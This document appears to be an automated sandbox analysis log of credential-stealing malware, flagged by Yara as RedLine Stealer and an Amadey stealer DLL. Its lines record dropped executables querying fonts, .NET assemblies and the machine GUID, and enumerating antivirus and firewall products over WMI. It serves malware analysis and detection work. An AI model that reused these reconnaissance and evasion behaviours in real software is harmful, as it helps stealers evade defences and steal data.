Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe

Code function: 7_2_011B583B cpuid

7_2_011B583B

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe

Code function: 5_2_00937155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_00937155

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe

Code function: 7_2_011C2872 _free,GetTimeZoneInformation,_free,

7_2_011C2872

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe

Code function: 7_2_011A2BC0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,

7_2_011A2BC0

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe

Code function: 5_2_00932BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

5_2_00932BFB

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Source: j8994074.exe, 0000001C.00000002.684022367.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.688308781.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.684022367.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000003.662103099.000000000B11E000.00000004.00000020.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000003.659346905.000000000B16A000.00000004.00000020.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.770898787.000000000B188000.00000004.00000020.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000003.659775198.000000000B0B8000.00000004.00000020.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000003.658986796.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.768018304.000000000B112000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 5.3.6F2B.exe.5125820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.j8994074.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.D217.exe.e9da20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000000.481478522.00000000007A2000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.467119503.00000000050EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.469686347.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: j8994074.exe PID: 6840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: n7660022.exe PID: 6980, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe, type: DROPPED

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 40.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.l2956268.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.g6604988.exe.11a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.y4910383.exe.4b9dc20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.y4910383.exe.4b9dc20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.l2956268.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rundll32.exe.6e800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.g6604988.exe.11a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000025.00000002.602481339.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.599605971.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.908966509.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.908661620.000000006E801000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.482305514.0000000000AF1000.00000020.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.470572149.0000000004B9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
